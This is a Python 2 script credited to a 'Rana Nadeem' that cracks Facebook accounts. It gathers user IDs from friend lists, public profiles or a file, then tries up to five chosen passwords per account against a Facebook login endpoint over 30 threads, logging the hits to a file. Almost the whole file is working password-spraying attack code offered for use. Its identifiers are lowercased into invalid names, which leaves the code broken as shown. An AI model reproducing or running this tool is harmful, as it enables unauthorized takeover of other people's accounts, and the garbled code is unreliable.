#!/usr/bin/python

# coding=utf-8

# originally written by:jam shahrukh

# source : python2"

# donot recode it. 

#import module

try:

    import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass,mechanize,requests

    from multiprocessing.pool import threadpool

    from requests.exceptions import connectionerror

    from mechanize import browser

except importerror:

    os.system('pip2 install requests')

    os.system('pip2 install mechanize')

    os.system('python2 nad33m.py')

#browser setting

reload(sys)

sys.setdefaultencoding('utf8')

br = mechanize.browser()

br.set_handle_robots(false)

br.set_handle_refresh(mechanize._http.httprefreshprocessor(),max_time=1)

br.addheaders = [('user-agent','dalvik/1.6.0 (linux; u; android 4.4.2; nx55 build/kot5506) [fban/fb4a;fbav/106.0.0.26.68;fbbv/45904160;fbdm/{density=3.0,width=1080,height=1920};fblc/it_it;fbrv/45904160;fbcr/postemobile;fbmf/asus;fbbd/asus;fbpn/com.facebook.katana;fbdv/asus_z00ad;fbsv/5.0;fbop/1;fbca/x86:armeabi-v7a;]')]

	 

def exit():

	print "[!] exit"

	os.sys.exit()

def acak(b):

    w = 'ahtdzjc'

    d = ''

    for i in x:

        d += '!'+w[random.randint(0,len(w)-1)]+i

    return cetak(d)

def cetak(b):

    w = 'ahtdzjc'

    for i in w:

        j = w.index(i)

        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))

    x += '\033[0m'

    x = x.replace('!0','\033[0m')

    sys.stdout.write(x+'\n')

def hamza(z):

	for e in z + '\n':

		sys.stdout.write(e)

		sys.stdout.flush()

		time.sleep(0.03)

		

##### logo #####

banner = """

██████╗░░█████╗░███╗░░██╗░█████╗░

██╔══██╗██╔══██╗████╗░██║██╔══██╗

██████╔╝███████║██╔██╗██║███████║

██╔══██╗██╔══██║██║╚████║██╔══██║

██║░░██║██║░░██║██║░╚███║██║░░██║

╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝╚═╝░░╚═╝                                                                                     

                                                                                                              

-------------------------------------------------- 

  author      : rana nadeem rajput

  github      : https://github.com/rananadeem5214

  youtube     : termux master

  telegram    : https://t.me/nadeem5214

 blogspot    : https://rananadeem.blogspot.com

-------------------------------------------------- """

back = 0

threads = []

successful = []

checkpoint = []

oks = []

idh = []

id = []

def menu2():

	os.system('clear')

	try:

		toket=open('login.txt','r').read()

	except ioerror:

		os.system('clear')

		print"[!] token not found"

		os.system('rm -rf login.txt')

		os.system('python2 nad33m.py')

		time.sleep(1)

	try:

		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)

		a = json.loads(otw.text)

		name = a['name']

		id = a['id']

	except keyerror:

		os.system('clear')

		print"[!] account is on checkpoint"

		os.system('rm -rf login.txt')

		os.system('python2 nad33m.py')

		time.sleep(1)

	except requests.exceptions.connectionerror:

		print"[!] no connection"

		time.sleep(1)

		exit()

	os.system("clear")

	print banner

	print "|[✓] name: "+name

	print "|[✓] id  : "+id

	print "-"+46*"-"

	print "[1] clone with 5 choice passwords."

	print "[2] clone with 2 choice passwords."

	print "[0] back to main menu."

	print "                      "

	menu2_menu()

	

def menu2_menu():

    m2m = raw_input('\nchoose option >> ')

    if m2m =="":

        print "[!] filled incorrectly."

        time.sleep(1)

        menu2_menu()

    elif m2m =="1":

        choice1()

    elif m2m =="2":

        choice2()

    elif m2m =="0":

        os.system('clear')

        hamza('please wait.')

        hamza('while is returning to main menu.')

        time.sleep(1)

        os.system('python2 nad33m.py')

    else:

        print "[!] wrong input."

        menu2_menu()

        

        

def choice1():

	global toket

	os.system("clear")

	try:

		toket=open("login.txt","r").read()

	except ioerror:

		print("[!] token invalid")

		os.system("rm -rf login.txt")

		time.sleep(1)

		os.system("python2 nad33m.py")

	os.system("clear")

	print banner

	print ("[1] crack from friend list.")

	print ("[2] crack from any public id.")

	print ("[3] crack from file.")

	print ("[0] back")

	print ("        ")

	choice1_menu()

def choice1_menu():

	c1m = raw_input("\nchoose option >> ")

	if c1m =="":

		print ("[!] fill in correctly")

		choice_menu()

	elif c1m =="1":

		os.system("clear")

		print (banner)

		pass1=raw_input("[1] input password  : ")

		pass2=raw_input("[2] input password  : ")

		pass3=raw_input("[3] input password  : ")

		pass4=raw_input("[4] input password  : ")

		pass5=raw_input("[5] input password  : ")

		print (47*"-")

		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)

		z = json.loads(r.text)

		for s in z["data"]:

			id.append(s["id"])

	elif c1m =="2":

		os.system("clear")

		print (banner)

		idt = raw_input("[rana] enter id : ")

		pass1=raw_input("[1] input password  : ")

		pass2=raw_input("[2] input password  : ")

		pass3=raw_input("[3] input password  : ")

		pass4=raw_input("[4] input password  : ")

		pass5=raw_input("[5] input password  : ")

		print(47*"-")

		print (banner)

		try:

			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)

			op = json.loads(jok.text)

			hamza("[✓] account  name: "+op["name"])

			

			time.sleep(0.5)

		except keyerror:

			print("[!] id not found!")

			raw_input("\npress enter to back ")

			choice1()

		print"\033[1;35;40m[rana] getting ids..."

		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)

		z = json.loads(r.text)

		for i in z['data']:

			id.append(i['id'])

	elif c1m =="3":

		os.system("clear")

		print (banner)

		try:

			idlist = raw_input("[rana] enter file path  : ")

			pass1=raw_input("[1] input password  : ")

			pass2=raw_input("[2] input password  : ")

			pass3=raw_input("[3] input password  : ")

			pass4=raw_input("[4] input password  : ")

			pass5=raw_input("[5] input password  : ")

			print(47*"-")

			for line in open(idlist,"r").readlines():

				id.append(line.strip())

		except ioerror:

			print ("[!] file not found")

			raw_input("\npress enter to back ")

			choice1()

	elif c1m =="0":

		menu2()

	else:

		print ("[!] fill in correctly")

		choice1_menu()

	rana = str(len(id))

	hamza ("[rana] total friends: "+rana)

	time.sleep(0.5)

	hamza ("[rana] the process has been started.")

	time.sleep(0.5)

	hamza ("[!] press ctrl z to stop process")

	time.sleep(0.5)

	print (47*"-")

	

			

	def main(arg):

		global cpb,oks

		user = arg

		try:

		    os.mkdir('save')

		except oserror:

		    pass

		try:

			a = requests.get("https://graph.facebook.com/"+user+"/?access_token="+toket)

			b = json.loads(a.text)

			

			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257c0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + user + "&locale=en_us&password=" + pass1 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

			q = json.load(data)

			if "access_token" in q:

				print '\x1b[1;96m[\x1b[1;96m[rana✓]\x1b[1;96m]\x1b[1;96m ' + user + ' \x1b[1;96m|\x1b[1;96m ' + pass1

				oks.append(user+pass1)

			else:

				if "www.facebook.com" in q["error_msg"]:

					print '\x1b[1;91m[\x1b[1;91m[rana💓]\x1b[1;91m]\x1b[1;91m ' + user + ' \x1b[1;91m|\x1b[1;91m ' + pass1

					crt = open("save/checkpoint.txt", "a")

					crt.write(user+"|"+pass1+"\n")

					crt.close()

					checkpoint.append(user+pass1)

				else:

					

					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257c0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + user + "&locale=en_us&password=" + pass2 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

					q = json.load(data)

					if "access_token" in q:

						print '\x1b[1;96m[\x1b[1;96m[rana✓]\x1b[1;96m]\x1b[1;96m ' + user + ' \x1b[1;96m|\x1b[1;96m ' + pass2

						oks.append(user+pass2)

					else:

						if "www.facebook.com" in q["error_msg"]:

							print '\x1b[1;91m[\x1b[1;91m[rana💓]\x1b[1;91m]\x1b[1;91m ' + user + ' \x1b[1;91m|\x1b[1;91m ' + pass2

							crt = open("save/checkpoint.txt", "a")

							crt.write(user+"|"+pass2+"\n")

							crt.close()

							checkpoint.append(user+pass2)

						else:

							

							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257c0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + user + "&locale=en_us&password=" + pass3 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

							q = json.load(data)

							if "access_token" in q:

								print '\x1b[1;96m[\x1b[1;96m[rana✓]\x1b[1;96m]\x1b[1;96m ' + user + ' \x1b[1;96m|\x1b[1;96m ' + pass3

								oks.append(user+pass3)

							else:

								if "www.facebook.com" in q["error_msg"]:

									print '\x1b[1;91m[\x1b[1;91m[rana💓]\x1b[1;91m]\x1b[1;91m ' + user + ' \x1b[1;91m|\x1b[1;91m ' + pass3

									crt = open("save/checkpoint.txt", "a")

									crt.write(user+"|"+pass3+"\n")

									crt.close()

									checkpoint.append(user+pass3)

								else:

									

									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257c0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + user + "&locale=en_us&password=" + pass4 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

									q = json.load(data)

									if "access_token" in q:

										print '\x1b[1;96m[\x1b[1;96m[rana✓]\x1b[1;96m]\x1b[1;96m ' + user + ' \x1b[1;96m|\x1b[1;96m ' + pass4

										oks.append(user+pass4)

									else:

										if "www.facebook.com" in q["error_msg"]:

											print '\x1b[1;91m[\x1b[1;91m[rana💓]\x1b[1;91m]\x1b[1;91m ' + user + ' \x1b[1;91m|\x1b[1;91m ' + pass4

											crt = open("save/checkpoint.txt", "a")

											crt.write(user+"|"+pass4+"\n")

											crt.close()

											checkpoint.append(user+pass4)

										else:

											

											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257c0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + user + "&locale=en_us&password=" + pass5 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

											q = json.load(data)

											if "access_token" in q:

												print '\x1b[1;96m[\x1b[1;96m[rana✓]\x1b[1;96m]\x1b[1;96m ' + user + ' \x1b[1;96m|\x1b[1;96m ' + pass5

												oks.append(user+pass5)

											else:

												if "www.facebook.com" in q["error_msg"]:

													print '\x1b[1;91m[\x1b[1;91m[rana💓]\x1b[1;91m]\x1b[1;91m ' + user + ' \x1b[1;91m|\x1b[1;91m ' + pass5

													crt = open("save/checkpoint.txt", "a")

													crt.write(user+"|"+pass5+"\n")

													crt.close()

													checkpoint.append(user+pass5)

										

																	

															

		except:

			pass

		

	p = threadpool(30)

	p.map(main, id)

	print "\033[1;97m-----------thanks for using my tool------------"

	hamza('[✓] process has been completed.')

	hamza('\033[1;97m[✓] checkpoint ids has been saved.')

	xx = str(len(oks))

	xxx = str(len(checkpoint))

	print ("[✓] total \033[1;32mok/\033[1;97mcp : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))

	print (47*"-")

	raw_input("\npress enter to back ")

	choice1()

	

def choice2():

	global toket

	os.system("clear")

	try:

		toket=open("login.txt","r").read()

	except ioerror:

		print("[!] token invalid")

		os.system("rm -rf login.txt")

		time.sleep(1)

		os.system("python2 rayees.py")

	os.system("clear")

	print banner

	print ("[1] crack from friend list.")

	print ("[2] crack from any public id.")

	print ("[3] crack from file.")

	print ("[0] back")

	print ("        ")

	choice2_menu()

def choice2_menu():

	c2m = raw_input("\nchoose option >> ")

	if c2m =="":

		print ("[!] fill in correctly")

		choice_menu()

	elif c2m =="1":

		os.system("clear")

		print (banner)

		pass1=raw_input("[1] input password  : ")

		pass2=raw_input("[2] input password  : ")

		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)

		z = json.loads(r.text)

		for s in z["data"]:

			id.append(s["id"])

	elif c2m =="2":

		os.system("clear")

		print (banner)

		idt = raw_input("[✓] enter id : ")

		pass1=raw_input("[1] input password  : ")

		pass2=raw_input("[2] input password  : ")

		print (47*"-")

		try:

			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)

			op = json.loads(jok.text)

			hamza("[✓] account  name: "+op["name"])

			time.sleep(0.5)

		except keyerror:

			print("[!] id not found!")

			raw_input("\npress enter to back ")

			choice2()

		print"\033[1;35;40m[rana] getting ids..."

		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)

		z = json.loads(r.text)

		for i in z['data']:

			id.append(i['id'])

	elif c2m =="3":

		os.system("clear")

		print (banner)

		try:

			idlist = raw_input("[rana] enter file path : ")

			pass1=raw_input("[1] input password  : ")

			pass2=raw_input("[2] input password  : ")

			print(47*"-")

			for line in open(idlist,"r").readlines():

				id.append(line.strip())

		except ioerror:

			print ("[!] file not found")

			raw_input("\npress enter to back ")

			choice2()

	elif c2m =="0":

		menu2()

	else:

		print ("[!] fill in correctly")

		choice2_menu()

	rana = str(len(id))

	hamza ("[rana] total friends: "+rana)

	time.sleep(0.5)

	hamza ("[rana] the process has been started.")

	time.sleep(0.5)

	hamza ("[!] press ctrl z to stop process.")

	time.sleep(0.5)

	print (47*"-")

	

			

	def main(arg):

		global cpb,oks

		user = arg

		try:

		    os.mkdir('save')

		except oserror:

		    pass

		try:

			a = requests.get("https://graph.facebook.com/"+user+"/?access_token="+toket)

			b = json.loads(a.text)

			

			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257c0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + user + "&locale=en_us&password=" + pass1 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

			q = json.load(data)

			if "access_token" in q:

				print '\x1b[1;96m[\x1b[1;96m[rana✓]\x1b[1;96m]\x1b[1;96m ' + user + ' \x1b[1;96m|\x1b[1;96m ' + pass1

				oks.append(user+pass1)

			else:

				if "www.facebook.com" in q["error_msg"]:

					print '\x1b[1;91m[\x1b[1;91m[rana💓]\x1b[1;91m]\x1b[1;91m ' + user + ' \x1b[1;91m|\x1b[1;91m ' + pass1

					crt = open("save/checkpoint.txt", "a")

					crt.write(user+"|"+pass1+"\n")

					crt.close()

					checkpoint.append(user+pass1)

				else:

					

					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257c0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + user + "&locale=en_us&password=" + pass2 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

					q = json.load(data)

					if "access_token" in q:

						print '\x1b[1;96m[\x1b[1;96m[rana✓]\x1b[1;96m]\x1b[1;96m ' + user + ' \x1b[1;96m|\x1b[1;96m ' + pass2

						oks.append(user+pass2)

					else:

						if "www.facebook.com" in q["error_msg"]:

							print '\x1b[1;91m[\x1b[1;91m[rana💓]\x1b[1;91m]\x1b[1;91m ' + user + ' \x1b[1;91m|\x1b[1;91m ' + pass2

							crt = open("save/checkpoint.txt", "a")

							crt.write(user+"|"+pass2+"\n")

							crt.close()

							checkpoint.append(user+pass2)

										

																	

															

		except:

			pass

		

	p = threadpool(30)

	p.map(main, id)

	print "\033[1;97m----------------------------------------------"

	hamza('[rana] process has been completed.')

	hamza('\033[1;97m[rana] checkpoint ids has been saved.')

	xx = str(len(oks))

	xxx = str(len(checkpoint))

	print ("[✓] total \033[1;32mok/\033[1;97mcp : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))

	print (47*"-")

	raw_input("\npress enter to back ")

	choice2()

	

if __name__ == '__main__':

	menu2()
